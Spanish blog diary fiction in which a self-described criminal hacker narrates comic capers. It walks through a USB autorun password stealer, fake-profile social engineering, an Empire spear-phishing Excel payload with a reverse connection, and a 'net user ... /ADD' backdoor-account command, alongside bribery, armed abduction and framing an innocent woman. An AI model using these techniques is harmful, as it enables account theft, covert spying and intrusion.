La nostalgia fue interrumpida por una llamada, era el Lalo, seguro me preguntaría por su cachorro

- Bueno
- Joven... dime que esta vivo
- Esta vivo, pero puede que ahorita este un poco babeado por mi perrita
- Ok, eso es bueno. ¿Por qué te lo llevaste?
- Por si tú o yo no volvemos
- Hum... - Lalo se quedó pensativo, él también entiende el riesgo al que nos enfrentamos en esta misión; el hecho de que ambos estemos trabajando juntos es el reflejo del riesgo, Mom nunca nos había puesto a los dos en una misma misión, eso quiere decir que esto es grave, tal vez más grave de lo que creemos. - ¿mañana empezamos?
- Si, le marcaré a Nemux para configurar el jump box, y cuando tengas las credenciales te las pasó
- Ok... buenas noches joven
- Buenas noches - y colgó

Querido Diario… en la semana rechacé algo que podría haber puesto fin a mi camino de turbidez e ilegalidad. Pero… hay cosas… personas, que son más importantes que cualquier otra cosa.

Tengo esperanzas en el Becario… tal vez tenga futuro. Y sino, es matemático… haré que hagan las predicciones en mis inversiones.

No hay comentarios

Domingo, 11 de Marzo de 2018: ¡Muchacho me tapaste el zinc!

  por , , ,

Querido Diario…

El día de ayer había sido un día altamente productivo en el que iba a dedicar toda la tarde a leer un documento; cuando alguien me distrajo de mis responsables actividades.

Obviamente me resistí.. como una hora. Y después de eso terminé tooooooda la tarde, noche, madrugada y siguiente mañana viendo Love.

Ok, no hice nada… y en la mañana estaba tranquilamente descansando cuando escuché que se azotó la puerta. Domingo, la puerta azotandose y el sonido de cumbias y salsas invadiendo la salsa. Eso sólo se podía significar una cosa. La señora Belén había ido a hacer la limpieza.

La señora Belén es mi sirvienta, inicialmente era de mi rentero pero terminó siendo mía. Y bueno, yo no ensucio mucho pero mis manos no fueron echas para agarrar escobas o lavar trastes, ¡yiuck!.

Me paré a cerrar la puerta y evitar que de pronto entrase a jalarme las cobijas. Ella tiene llave de mi casa y sabe que si la puerta de mi habitación está cerrada es porque estoy en cueros, y es mejor que haga toda la limpieza de lo demás primero y deje al final la habitación; pero en esta ocasión no le importó y me sacó a rastras de la habitación.

- ¡Muchachooooooooooo! '¡ra no'más lo que hiciste

Sabía que estaba abajo en la cocina, pero su voz se escuchaba hasta arriba como si la tuviese a un lado.

- Allí déjelo, al rato lo lavo - grité
- ¡Qué al rato ni que al rato!, párate ahorita mismo y vas a ver la tarugada que hiciste - Si, allí la tenía al lado de mi pegándome a donde cayese
- ¿Ahora que yo hice?, sea lo que sea tiene una explicación - intentaba detener los golpes mientras bajábamos las escaleras
- ¿Qué explicación?, si tapaste todo el zinc

¡Ohhh! paréntesis; para los amantes del español. Zinc en cachanillo significa lavabo.

- A ver, ¿qué explicación tiene eso?
- Ohhhh si la tiene, de hecho es muy buena. Miré el otro día estaba yo haciendo chocolates, pero no lograba hacer la mezcla correcta; entonces tuve que tirar varías mezclas y las tiré al lavabo... y de pronto ya no se empezó a ir, y fue cuando me di cuenta que verter chocolate líquido caliente a una tubería fría había sido mala idea y... pues, henos aquí, con el "zinc" tapado.

Pensé que con esa explicación era suficiente para que ella entendiese que todo había sido un accidente. Pero no… con la señora Belén, nunca se puede dialogar.

- ¿Qué estas tarado?
- Oiga... no sé como es la vida en Mexicali, en serio aquí es otro país, pero... usualmente de donde vengo, las sirvientas no le gritan al patrón

Vi la furia en sus ojos, me hice bolita, y lo hice muy rápido; y sólo alcancé a sentir el escobazo en la espalda… y luego otro, y luego otro más, y luego uno más; hasta que me resbalé; y empecé a rezar por mi vida.

- Ante ti poderoso señor de la verdad y la luz me presento; nada poseo salvo mi propio ser y mi humana naturaleza. Señor guerrero por excelencia, tus armas truncaron los sables de Dios... 
- ¿Qué estas diciendo? - la señora Belén es peor que mi mamá, creo que sólo se podría comparar con la señora Esthela
- Pues estoy rezando
- ¿Qué clase de padre nuestro es ese?
- Ya le había dicho que no soy cristiano - y esa respuesta se tradujo en otro escobazo
- Ya párele, ¿no?... ahorita lo arreglamos
- ¿Y cómo piensas arreglarlo?
- Pues... pues... quito el tubo, le pongo otro tubo; y ya... así de facíl
- ¿Y tú sabes de poner tubos?
- Hum... no, pero... ñeeee.. ¿qué puede salir mal?

Querido Diario… como decía un maestro de Química que me dio clase en UPIBI… “¿fontanero yo?, si para eso estudié?”.  Unas horas después estábamos inundados en la cocina; teníamos a un verdadero fontanero arreglando el lavabo y la señora Belén estaba tan enojada que no tenía ganas ya de pegarme.

- Oiga.. 
- ¿Qué? - me miró de una forma que sabía que cada palabra que dijese podía representar mi eventual muerte; o peor, que renuncie
- Ya hace hambre, ¿no?
- Pues si, pero yo no voy a poder ir a comer; ahorita mis hijos ya deben andar en el sobre ruedas; y yo aquí esperando a poder secar la cocina
- Yooo... yoooo.. pues usted ya se dio cuenta que esto de la fontanería no es lo mío, perooo... yo creo que va a tardar - y me miró con unos ojos aun más amenazantes - hum.. oiga.. ¿le gusta el rámen?
- Si
- Pues yo propongo que vayamos a comer, mientras el señor termina y nos relajamos un poco.. usted deja la escoba; y firmamos las pases
- Bueno

Fuimos a un sitio llamado Umai, hace poco comí allí y me gustó mucho; hacen un rámen muy bueno… que extrañamente me recordó el mole de olla de mi abuelita.

- ¿Y ahora por que estas aquí?
- ¿Cómo?
- Si, tienes rato que no te vas
- Ouuuu.... tube unas discrepancias laborales y hum... digamos que la competencia me quiere desaparecer. Así que el dueño de donde trabajo prefiere que este aquí antes de que me pase algo malo
- Hum... ¿qué estudiaste?
- ¿En la escuela?
- Si
- Ahhh no estudié aquí; también estudié en el DF, estudie Ingeniería en Sistemas Computacionales son especialidad en Sistemas
- Hum... nunca te había preguntado a que te dedicabas, pero si.. pareces como algo de computadoras
- ¿Cómo es eso?
- Pues sólo te faltan lentes para verte como ño... 
- Señora, termina esa palabra y juro que le sorrajo el plato en la cabeza
- ¿Puedes hackear un Facebook?
- Pfff.. ¿por qué la gente siempre busca eso?... no lo parece pero estudié una ingeniería en una de las mejores escuelas del mundo; ¿y quiere que hackee un Facebook?
- Huuuuy pues perdón, era un favor - y me empecé a reir

El “Huuuuuy pues perdón” es una frase que yo digo mucho, y que ahora se le ha vuelto costumbre decir.

La señora Belén tenía un problema; uno de sus hijos cree que anda hum.. consumido cosas que no debe; y está un poco asustada porque hace poco le encontró algo más “fuerte”. Así que quiere entrar a su Facebook para saber que esta haciendo su hijo.

- ¿Qué no ha escuchado de la privacidad?
- ¡Ay chamaco!, ¿a poco tu mamá no haría algo así?
- Hum... sinceramente... creo que no. A la primer sospecha me habría roto algún hueso
- Bueno, pero seguro tu no hiciste nada de eso; y ella no tenía que preocuparse
- No, pues no
- Nunca te drogaste
- Bueno... comparado con el croc, la cocaína; no... es casi un dulce
- Ni bebiste en la escuela
- Bueno... no, ósea en la vocacional asaltábamos las camiones de Corona, pero no... no me gusta la cerveza
- ¿Ves?, en cambio este pen... ashh.. es que ya no se que hacer
- Hum... - quería ayudarla, pero ¿y mis principios?, ¿y mi ética?
- Anda
- Eso está un poco mal, tal vez debería de hablar con su hijo... al viejo estilo; creo que a usted se le da
- ¿Cómo?
- Hum.. *ALGUIEN* alguna vez me dijo que en Mexicali si acostumbraba la educación a base de la chancla
- Ay no sé, anda en malos pasos... imagínate que tu hubieses mentido, robado, engañado, hecho cosas malas; ¿dónde habrías acabado ahorita?
- Ouuuuu.. en la H. Organización Turbia e Ilegal.. ¿cree que le interese ser becario?, tenemos gente en Mexicali; podría trabajar conmigo
- Déja de bromear muchacho

Si, al final terminó convenciendome. Así que acepté.

- Miré, le voy a preparar algo... usted sabrá si lo usa o no. Pero, a mi no me meta, ni me diga nada. Sólo le advierto, a veces conocer las cosas de todos puede ser no tan bueno
- Ok, ok... ¿que hay que hacer?
- Vamos al Office Depot

Pasamos a comprar una memoria USB, el limpia pisos que le gusta y una cosa, que no recuerdo cual es la palabra; pero es la palabra cachanilla para destapa caños. Era un liquido pero, ella le dijo de otra forma.

- Oye muchacho
- ¿Eu?
- Una vez vi una película que se llama El intruso, ¿lo que vas a hacer no es igual?
- Hum.. si y no, no y si.... miré, si hay gente mala; muy mala que hace cosas como en esa película. Pero yo no... yo... es difícil explicarle
- ¿Puedes hackear un carro?
- Hum... pues nunca lo he intentado; teóricamente si, pero en práctica no estoy seguro
- ¿Cómo aprendiste todo esto?, ¿en la escuela? yo estaba pensando en mandar a mi hijo a CETYS
- Hum... no aprenderá eso allí. No lo sé... es complejo; y créame no quiere su hijo aprenda esto. Le voy a explicar paso a pasito, para que me entienda lo que estoy haciendo, vea que no es nada del otro mundo, pero... entienda lo que implica. ¿Hecho?
- Hecho - e hice como que me escupía la mano y se la daba.

Pensé en el método menos feo para enseñarle; tampoco quería meterle en un problema. Así que pensé en hacerle un USB password stealer; usando Web Browser Pass View. No es nada del otro mundo, sólo una herramienta que saca el dump de las contraseñas almacenadas en el navegador. Perfecto para que la señora pueda obtener las credenciales de Facebook, Twitter, Instragram, Snapchat, Plurk… no que quiera, sin hacer algo “malo”.

Descargue la herramienta y la coloqué en la memoria USB, luego cree un bat para ejecutarla:

Después de creado el bat, hice también un autorun, para que la herramienta se ejecute con sólo meter la USB en una computadora y en ese momento sacar todos los passwords:

Y le enseñé a la señora como funcionaba:

¡Oh diablos!, esos son mis passwords de algunas cosas y les había visto la señora Belén.

En fin, después de que terminó la inundación; la señora me puso a ayudarle a secar toda la cocina; tendió mi cama y me agradeció la comida. Se llevó una USB que únicamente con conectarla podrá espiar a su hijo de en medio… si, creo que eso no es correcto pero… ella me cae bien.

- Gracias muchacho
- Hum... yo creo que... no debería. Dele un sape como las madres de antes
- Al que le voy a dar el sape es a ti si vuelves a tapar el zinc
- Nooooo, por favor - e hice como que me hacía bolita - oiga
- ¿Qué?
- ¿Cómo se va a ir?
- Pues voy a tener que pedir un Uber, porque ya no está mi hijo mayor para que venga por mi
- ¿Dónde vive?, yo la llevo
- Pues si, porque son como $100 hasta allá, esta bien caro muchacho. ¿Conoces Villa Florida?
- Hum... olvídelo, buena suerte
- Ven para acá
- Ohhhh ya voy subase
- Si tiene mala fama el fraccionamiento, pero no está feo, es sólo mala fama
- No era por eso, soy chilango... nada por aquí puede ser lo suficientemente peligroso para mi
- ¿Entonces?
- Oiga... necesito un favor a cambio
- ¿Qué?
- Usted me dijo que luego iba mucho a San Pedro porque se dedica a los banquetes, ¿no?
- Si
- Voy a comprar una casa, quiero una grande, con alberca de preferencia y aire acondicionado del que va por dentro... consígame una ¿no?
- Ay muchacho... cuando te conocí estabas bien flaco de que no tenías dinero, incluso me quedaste a deber; y ¿ahora hasta casa?, ¿en que andas metido?, no vaya a ser que tenga que usar la cosa está en ti para saber que te traes
- Huuuuy no señora; capaz que se me espanta
- Bueno, yo te aviso. Gracias por el "raite"
- Hum... cuídese, el domingo no voy a estar. Salgo de viaje y regreso pero hasta la tarde; cierra bien; y le lava su tapetito a Shellcode.

Querido Diario… ser adolescente en la era de la tecnología debe ser difícil. Pobre de su hijo, si así me pega a mi… creo que le a romper algo importante. Pero… como decía mi abuela; así se educa a la gente.

2 comentarios

Jueves, 8 de Marzo de 2018: El muchachacho del hurón diabético

  por , , ,

Querido Diario…

La mañana había empezado como cualquier mañana. El despertador sonando cada 5 minutos por una hora antes de poder abrir los ojos; y entonces lo escuché, no era la alarma del despertador, era el tema de Hank Moody que tengo configurado como tono de llamada en el celular. Era Mom.

- Bueno
- Hola, ¿cómo estas?
- Bien
- Que bueno, ¿estas ocupado?
- No, ¿qué pasa?
- Tenemos una situación
- Pensé que habías dicho que tomase unos días después de lo que me pasó - espeté
- Si, pero... te paso la información por correo. Necesito a este peón fuera del camino, ¡ya!
- Señor, si señor - dije mientras aun con los ojos dormidos y entre las cobijas, arremedaba un movimiento marcial

Con trabajos me logre recargar en la cabecera de la cama y abrir la computadora. Desde que había regresado de la última misión, todo a mi alrededor era como una película; había basura de pizza, chetos y Red Bull. Si no fuese porque no puedo beber alcohol, probablemente habría estado ebrio desde hace una semana atrás.

Como pude intenté enfocar la información, no veía nada sin lentes. Pero pude distinguir unas cuantas palabras al azar, Armando Gómez, jefe de editores, periódico La Nación, lavado de dinero, político, ex gobernador.

Demonios, si iba a necesitar los lentes, y otro Red Bull… parece que mis vacaciones se habían terminado.

Después de hacer todo un ritual para revivir me miré al espejo. Que mal me veía, había dormido casi toda la semana, pero estaba lleno de ojeras. Sólo pasé una semana en la guerra y había terminado así; no entiendo como las personas sobreviven a años en conflictos armados. Pero bueno, al parecer Mom había entendido que lo mío no son los conflictos internacionales, no soy un héroe de guerra, yo soy una mala persona, sólo soy turbio e ilegal, hago “trabajitos” para los ricos y poderosos, a cambio de vivir en Mexicali.

Leí toda la información, y pude hacer un resumen de la situación.

Armando Gómez era el jefe de editores de un periódico local en Veracruz, quién había sacado a la luz, aparentemente; algunas notas que exponían los sobre pagos realizados por parte de un político veracruzano a varias empresas fantasma. De alguna forma, el señor Gómez había sido revirado y encarcelado por difamación, cuando no pudo en el MP mostrar la información. Sin embargo, el señor Gómez siempre insistió en que él no había autorizado la publicación de esas notas, ni las había visto. En pocas palabras, el señor Gómez decía que no tenía nada que ver con las notas, que él no había hecho esa investigación y que jamás había estado relacionado.

Mi intuición turbia e ilegal me decían que el señor Gómez, en efecto; si sabía de esos movimientos turbios, y que además, conocía algo que a Mom le preocupaba. Pero, él no había publicado la información, había sido alguien más, pero ¿quién?.

- Bueno
- Hola, ¿ya leíste la información?
- Si
- Perfecto, lo quiero fuera
- Hum... no creo que haya sido él - Mom explota cuando le llevan la contrá
- ¡¡¡¡¿¿¿Qué????!!!
- Que no creo que haya sido él
- Es su periódico - dijo Mom más calmado
- Si, pero ¿qué ganó con eso?, ¿unos tehuacanazos y habitación con tres comidas incluídas y una hora de ejercicio al día en El Infierno?
- Entonces, ¿es innocente?, ¿lo mando sacar?
- No, calma... es innocente de publicar la nota, eso creo; pero... hum... creo que él sabe quién publicó la nota. Dame unos días, necesito investigar.¿Cual es mi alcance?
- El que tu definas, sea quién sea el peón, lo quiero fuera del tablero
- ¿Fuera? - pregunté, sólo para aumentar el dramatismo de la conversación
-. Fuera
- Ok, te aviso

Bien, ya tenía carta abierta y tenía el alcance que yo “definiciese”, eso en traducción de Mom quiere decir que con mi siguiente pago habrá suficiente dinero para comer carne, de la buena.

Primero que nada debía de averiguar a quién estaba ocultando el señor Gómez, intenté buscando información sobre sus redes sociales, pero lo único que encontré fue una cuenta de Twitter, que con Maltego no pude relacionar a nada, y la cuenta de Twitter de una periodista que sólo trabaja en el mismo sitio, pero eso no me decía nada. Ni siquiera era capaz  de reconocer la cara del tipo de lo borrosa que era la foto como para buscarla usando Google Images.

Lo único que hasta este momento sabía era que le gustaba la playa y estaba un poco rellenito.

Descubrí una opción medio interesante en Maltego con licencia. Hay una transformación que funciona con un nombre, así que pusé Armando Gómez, y aunque es un nombre bastante común que me arrojo más de 1000 resultados, era lo mejor que tenía, tuve que buscar uno por uno hasta encontrar la cuenta correcta, pero cuando encontré la cuenta de Facebook, más la usuario de Twitter que ya conocía que también trabaja con él; pude hacer la relación y saber cual era su cuenta de Facebook, ahora sólo me faltaba buscarlo en Facebook, y bueno… además de la playa y comer mucho, parece que al señor Gómez le gustan los perros.

Ese comentario fue suficiente para identificar al Señor Gómez, los sitios que frecuenta y sus familiares completos, los familiares de los familares; y así una lista interminable, aun cuando el señor Gómez tenía aplicadas todas las reglas de privacidad, típico de alguien relacionado a medios. Como regla general siempre se puede decir que los permisos de una aplicación se heredan de donde se hace la publicación.

Era obvio que el señor Gómez ya no me podía agregar, pero generé un perfil falso para empezar a relacionarme con personas cercanas a él. Para ello utilice mi VPN para conectarme a través de algún servidor alejado que evitase que Facebook me relacionase con el perfil falso y empecé a generar una cuenta falsa.

Primero que nada utilice una cuenta Checa de Protonmail con la cual registre una cuenta de Facebook.

Para verificar la cuenta es muy sencillo utilizar servicios de SMS gratuitos en internet que lo que hacen es exponer número de teléfono, que reciben los mensajes. Usualmente se utilizan para confirmaciones de códigos, sólo recuerda que estos van a quedar expuestos al público, no vaya a ser que de pronto alguien te hackee.

Una vez que tenía el perfil falso agregué a su esposa, hijas, primos, familiares y amigos; y esperé a que alguno me agregase. Si me llegaron a agregar a algunos; pero por más mujerzuela que me comporté, no logré obtener más información que me acercase a mi objetivo.

La idea de todo esto era enviar algo por correo electrónico o por un mensaje que me permitiese tener control de algún equipo muy cercano o el mismo al que usaba el señor Gómez, para poder tener acceso a toda su información. Para ello busqué varias opciones y la que me pareció más viable fue generar un payload utilizando Empire.

Empire es una serie de herramientas en PowerShell, que ojo… no por leer PowerShell te imagines MS Windows; en realidad es multiplataforma, pero es más sencillo de instalar en Linux. Y que permite realizar ataques automatizados de Spear Phishing.

Instalarlo es muy sencillo, basta con descargarlo y ejecutar el script de instalación que se encargará de descargar todas las dependencias.

Al igual que es muy fácil de instalar, su ejecución también es muy sencilla, a través de un menú en consola.

El objetivo de realizar el Spear Phishing es poder acceder al equipo remoto de la persona atacada, para ello es necesario enviar un correo o mensaje con un payload, que es la acción que vamos a realizar una vez que la persona lo abra. En este caso, lo que yo quiero es establecer una conexión remota para poder acceder a la computadora de la persona que abre el archivo y poder revisar la información que tiene almacenada en ella; en caso de que allí no hubiese información relevante, podría utilizar esa misma computadora para poder atacar a otras que esten en el mismo segmento de red; en este caso los equipos que se encuentren en la misma casa del señor Gómez.

Existen diferentes métodos, pero yo me fui por la inyección de un objetivo embebido en el mensaje, ¿por qué?, no me preguntes. Con tantas cosas no tengo tiempo de pensar el porque hago las cosas 😛

Algo que se debe de tener en cuenta es que una vez que la persona abra el archivo y se ejecute el payload este va a lanzar una conexión hacia una dirección IP, y está dirección IP de preferencia tiene que ser homologada; ¿por qué?, porque si usamos la dirección IP de nuestros servicios de internet casero la dirección IP usualmente se renueva cada 72 horas, y puede que al ejecutarse el payload ya no este la dirección donde esperamos obtenerla.

Por ello tuve que conseguir una dirección IP homologada, y obviamente que no fuese de la H. Organización Turbia e Ilegal, porque pues.. eso nos haría rastreables. Por lo que comprometí la red de un antiguo empleo a través de un amigo para poder llegar a mi propósito.

Mi objetivo, agregar su esposa a Facebook y que le enviase un mensaje o correo para comprometerla a ella.¡

Una vez que tuve a un incauto cachanillo al cual chamaquear, no me quedó más que usar uno de mis payloads más sencillos que lo único que hace es agregar un usuario mediante el comando:

net user vendetta ..pobremax!! /ADD

Así que mientras Max comía sus sagrados alimentos, yo sólo de forma muy rápida conecte mi USB Rubber Ducky para agregarme a su equipo, y después poder conectarme de forma remota.

Y listo; ya dentro de la red de Social Ral.. digo, de alguna empresa poco conocida por sus malos sueldos y poca innovación; y gracias a que a alguien se le ocurrió hacer uso del blade de HTTPS inspection en el firewall, pude fácilmente capturar unas contraseñas de alguien, “alguien” que usa Linux para poder allí esperar la conexión que se crearía después de ejecutar el payload a través del Spear Phishing.

Si, ya  sé… esto esta muy revuelto; pero debes de recordar que yo no soy precisamente alguien muy ordenado.

Ahora ya todo estaba listo… ah no, me faltó hacer el payload 😛

Primero con Empire me di a la tarea de crear un BAT para realizar la conexión en reversa, el cual es el que voy a agregar a un archivo de Excel que será lo que yo ponga como adjunto en un archivo.

Una vez que cree el payload, lo agregué como un objeto simplemente usando las opciones propias de Excel.

Y una vez que lo tenemos agregado, hay que seguir el principio básico: #viejastodassoniguales. Y ponerlo en un correo:

Y si.. era ¡obvio! que caería… hum… no -_-U no cayó. ¡Demonios!.

Seguí intentando platicar con la esposa a través de Facebook y nada, esta señora algo tramaba. Y creo que no caería si el correo no le llegaba de alguien de confianza, pero ¿quién?.

Así es, el señor Gómez.

Sólo había un problema, el señor Gómez estaba en la famosa cárcel fundada por Porfirio Díaz llamada “El infierno” en Veracruz. Y esa misma cárcel es donde yo estuve hace no mucho por delitos informáticos, así que necesitaba de alguien que me ayudase a hacerle una visita al señor Gómez para poder sacarlo, hacer que enviase el correo y finalizar la tarea.

Y como caído del cielo, Eljoshuapuntocom apareció.

- Hola
- Hola Señor Belindo
- Oye, si te doy el día, pero necesito un favor después
- Claro que si, tu dime - me respondió de forma muy proactiva; sólo que había olvidado algo
- Necesito que me acompañes a Veracruz para sacar a un tipo de la cárcel, hacerle unas preguntas y regresarlo vivo
- ¿Qu... - olvidaba, Joshua no sabía de lo ilegal que éramos

La forma en que reclutamos en esta H. Organización Turbia e Ilegal es muy rara, y se me olvidó alguna vez decirle a Joshua que éramos ma.. bueno, que no necesariamente éramos buenas personas; así que él me dijo que sí, pero creyó que estaba bromeando. Por alguna razón todos siempre creen que bromeo. Me di cuenta de ello cuando vi que lo tomaba tan a la ligera… ósea, si somos un tanto cínicos en la forma en que nos manejamos, perooo… hum… o Joshua era muy valiente o no sabía que hablaba en serio.

Pero bueno, de alguna forma este muchacho tenía que aprender. Así que aliste todo para nuestro viaje.

Debido a mis buenas relaciones con gente de gobierno y a $100k dlls que me dio de presupuesto Mom para el proyecto; logré tener dos horas con el señor Gómez en las cercanías del penal. Busqué una suite de lujo y preparé todo para ir para allá.

Llegamos al penal y me presente:

- Hola mi poli - me dirigí hacia el guardia de la puerta
- Ya pasó la hora de visitas joven - me dijo de forma indiferente, sin siquiera levantar la mirada
- Hum... no creo que yo tenga horario - dije, mientras aventé una maletita de viaje con $20k dlls a su mesa

¡Ahhh México!, nos abrieron las puertas y salió una persona con cara de confusión esposada de las manos. Era el señor Gómez.

- Dos horas, no más o te va a salir carito - me dijo el guardia mientras volvía a cerrar la puerta

El tipo nos miraba con miedo, supongo que no es normal que de pronto alguien te saque de la cárcel. Me levante la sudadera y le apunte a la frente.

- Sube al coche - le dije friamente
- Belindo - interrumpió Joshua
- ¿Qué?
- Eso es un arma de verdad
- Si, se llama Valentina; es una Colt 32, me gusta el viejo estilo - le expliqué mientras se la acercaba para que la viese
- Belindo
- ¿Si?
- No se te hace como que eso es un poco peligroso
- Pues.. depende de que lado del arma estes
- Belindo
- Hum... ¿qué?
- ¿Por qué tienes que usar un arma?
- Porque a veces los tipos malos se ponen locos, y hay que tranquilizarles
- Belindo
- Joshua
- Esto creo que si es un poco turbio... y también creo que ilegal
- Bien... ya estas aprendiendo, vamos, súbelo; en Amor Secreto pagamos sólo cuatro horas, hay que apurarnos

Nos dirigimos al hotel y empujamos al señor Gómez. Lo sentamos en una silla, apagamos las luces y le pusimos la luz del celular directo a los ojos. No tengo idea de para que sirva eso, pero lo he visto en las películas. Después de eso abrí una mochila y saqué un taladro.

- Buenas noches señor Gómez, que tal. Mi nombre es Augusto, y básicamente vengo para matarlo de forma lenta y dolorosa, mientras le platicamos como hemos matado a toda su familia
- Sea lo que sea, yo no lo hice, lo juro - dijo asustado, sabía que le iba a pasar; eso quería decir que ya había tenido malas experiencias. 
- Sabe... si le creo; creo que le están poniendo un cuatro
- ¿En serio?, ayúdame entonces - el semblante de su cara cambio, notó esperanza
- Si, pero también necesito de su ayuda
- Lo que quieras, por favor
- Le voy a pasar una computadora, y va a enviarle un correo a su esposa
- ¿Estas loco?
- No. No fue ella señor Gómez. Ella es quién sacó el periodicazo con la información que ella sabía de usted
- Imposible
- Por favor.. ¡viejas, todas son iguales!
- Es mi esposa
- Peor
- ¿Cómo sé que dices la verdad?
- Bueno.. yo creo que si yo fuese mujer y mi esposo estuviese en la cárcel. Estaría en este momento rodeada de abogados pensando como sacarlo de aquí, y no de viaje en Chicago
- ¿Qué?
- Y entonces le mostré una fotografía de Facebook
- Pero... 
- Vamos señor Gómez; usted déjeme todo a mi; sólo mándele un correo

Lo vi en su cara, rabia, tristeza, indignación… todo en un sólo momento. Joshua le acercó la computadora ya con el correo abierto y el archivo adjunto, y lo envió.

Me sentí un poco mal, así que mandé a pedir la cena; y le desaté las manos; no sin separarme de Valentina.

Una hora más tarde la alarma sonó, y le hice señas de que debíamos volver.

- ¿Qué pasará ahora?
- Hum... demostraremos que fue ella, ella terminará aquí; usted quedará libre y ... pues ya

No me dijo nada.

En silencio nos dirigimos nuevamente a la cárcel, lo empujé dentro mientras el guardia agradeció con un movimiento de la mano. Me giré y me subí al coche con Joshua, y empecé a manejar hacia Xalapa. No pensaba quedarme en el Amor Secreto a pasar la noche.

- Belindo
- ¿Si?
- ¿Cómo supiste que ella estaba en Chicago?
- No lo sabía
- ¿Entonces?
- Le mostré una foto cualquiera
- ¿No era ella?
- No... ella realmente si esta rodeada de abogados, pero... ni modo
- Belindo
-¿Si?
- Creo que Dios nos va a castigar por esto
- Chucho Cristo no es alguien que me importe mucho, si un día lo veo, Valentina le va a dar un besito
- Belindo
- Joshua
- Eres muy hereje
- Y Dios no existe

Llegamos a Xalapa, y apenas estuvimos en la habitación abrí la habitación. Todo había salido perfecto.

Extranje screenshots de la computadora y hice un archivo lleno de evidencia que implicaba a la esposa del señor Gómez. Después de ello, se lo envié a un viejo amigo de inteligencia financiero; que me agradeció. A su edad ya busca el retiro y ese tipo de notas le dan puntos para tener un descanso feliz.

Joshua volvió al DF y yo a Mexicali.

Al llegar lo primero que hice fue ir a comer con mi amiga Chicachimeria tacos de carne asada.

Platicamos un tiempo y entonces la dejé en su casa y yo me fui a la mía. Llegué y me tumbé en el sofá, estaba muy cansado, había sido una semana muy ajetreada y entonces entró la llamada que ya se había tardado.

- Bueno
- Hola, ¿cómo estas?
- Bien
- ¿Estas ocupado?
- No, ¿qué pasó?
- Acaba de entrar la vieja está al Infierno
- ¿Cuanto le dieron?
- 18 años
- Suena bien,¿no?
- No los va a cumplir
- ¿Le van a dejar salir antes?
- No, pedí que la trasladen mañana a otro infierno
- ¿Uno con fuego y tridentes?
- Si
- Ouuuuu... suena mal
- Gracias
- No se agradece; ya te transferí lo que me sobró de fondos. 
- Perfecto

Me tiré al sofá y me puse a leer una revista sobre los kamikazes. Poco más tarde Mom me mandó un mensaje.

Mom requiere para mañana a un grupo de los más turbios e ilegales integrantes de la H. Organización Turbia e Ilegal.. ¿para qué?. No pregunté, pero debía ser para algo grave.

- Bueno
- ¡Lalo!
- Joveeeeeeeen, ¿alitas?
- No, estoy en Mexicali
- ¡Ahhh!
- Mañana ve con Mom, llévate a hum... no sé, necesitamos gente con la actitud. Turbios, ilegales, corruptos, sin miedo a nada
- Bien
- Me avisas que pasa
- Bien
- Adios
- Sale

Hum… Querido Diario, tengo la extraña sensación de que muy pronto me uniré al H. joven Candia para algo muy, muy, pero muuuuuuuy malo.

Por cierto Querido Diario, del día 14 al 19 de Marzo se llevará a cabo la FIL de la UABC; y justamente platicaré sobre la idea de un tipo turbio e ilegal, que hace cosas muy malas, para gente más mala; y que intenta limpiar un poco su conciencia enseñando un poco de seguridad informática a través de extrañas situaciones reales, que parecen demasiado fantasiosas, y que por desgracia la realidad incluso les ha superado. ¡Qué hacker épico, ni qué hacker épico!, tú Querido Diario, vas a ser más pro 😉

No hay comentarios

Domingo, 31 de Diciembre de 2017: El gran golpe

  por , ,

Querido Diario…

Si te pones a leer las historias de grandes golpes relacionados al hacking del pasado, siempre todos se realizaron en fechas como Navidad, Años Nuevo, Black Friday… el Día Internacional de Belinda. Los RR’s habían elegido Año Nuevo.

Compré mi boleto de avión para Mexicali, en caso de que las cosas que pusiesen feas preferí estar cerca de la frontera para huir. Créeme, no querrás pasar por una cárcel mexicana. En EEUU si tienes algunos amigos es fácil mantenerte oculto, es un país mucho más corrupto que México, y aun en el caso de ser detenido, por su ley de seguridad interior sería encarcelado en EEUU, y eso me garantiza una vida decentemente lujosa y mafiosa.

Antes de tomar el avión fui a desayunar con una amiga, me hablo para pedirme un favor; y bueno… dado que puede que no sobreviva a este 2017, decidí desayunar con ella para poderle ayudar. Me contó una historia un tanto personal, que terminó en un “puedes investigar sobre él, si es malo no me digas que es, sólo dime que me aleje de él; si es algo bueno, entonces todo bien”…

Querido Diario.. #viejastodassoniguales… durante mis días de hambre; me dediqué a sacar contraseñas de Facebook por dinero; cobraba poco, unos $100 por contraseña, pero que eran suficientes para poder comprar atún o avena; eso me mantuvo sin morir de hambre mientras conseguía un empleo en Mexicali. Yo creo que conseguí unas 30 cuentas de Facebook para amigas, conocidas, amigas de la amiga y en el 100% de los casos, ellas tenían razón; él las estaba engañando o peor aun, ellas ni siquiera se habían dado cuenta que las estaban engañando… pero lo curioso es que, de esos 100% de casos, ellas terminaban de nuevo con el mismo tipo o_O … fue algo que discutí con dos de mis más cercanos asesores de confianza.

Al final tuve que acceder, pero eso sería después; primero tenía que resolver mi problema actual.

Antes de tomar el vuelo pensé en ir a ver a Mylena, de cierta forma me sentía un poco mal. Ella no tenía la culpa directamente, había sido víctima de unos tipos que sólo buscaron aprovecharse de su objetivo de salir de su país, aunque eso no la disculpa por involucrarme a mi. Así que al final determiné que era una mala persona por haberlo hecho y preferí no verle. De todas formas ya estaba en México, aun cuando fuese detenida, estaría mejor que en Rusia.

Me despedí y me dirigí al aeropuerto, el bueno Y752… ese número lo tengo siempre presente. Abordé e intenté quedarme dormido, aunque no pude. Así que me puse a leer un libro que me regalo mi amigo Bytevick: Ernest Hemingway on writing. Es la primer vez que leo un libro en inglés que no es técnico, y me estaba costando mucho trabajo.

Llegué a Mexicali en el vuelo de la mañana, es raro estar a dos horas de diferencia. Hace mucho me parecía algo normal, ahora me es más extraño.

En los últimos meses han remodelado mucho el aeropuerto, pero jamás han puesto otro cajero que no sea el de HSBC. Tomé un taxi y fui a casa. El taxi tomo la calle, pasó por las plazas nuevas, donde antes no había nada, CETYS, el Starbucks donde usualmente trabajo, el Walmart y siguió de frente. Al llegar lo único que quería era tirarme en la cama y quedarme dormido para no pasar el año nuevo, pero había que trabajar.

De cierta forma, mi trabajo era el sencillo. Sólo generar un punto de distracción, ser trazado y esperar a que la policía viniese por mi, me metiese unos tehuacanazos y me llevase preso mientras los RR’s huían con todo el dinero hacia algún otro país para hacer lo mismo, pero aun así tenía su chiste. Usualmente los días como hoy, los SOC’s están acostumbrados a recibir montones de ataques comunes, así que debía de ser un ataque lo suficientemente bueno como para realmente generar la distracción.

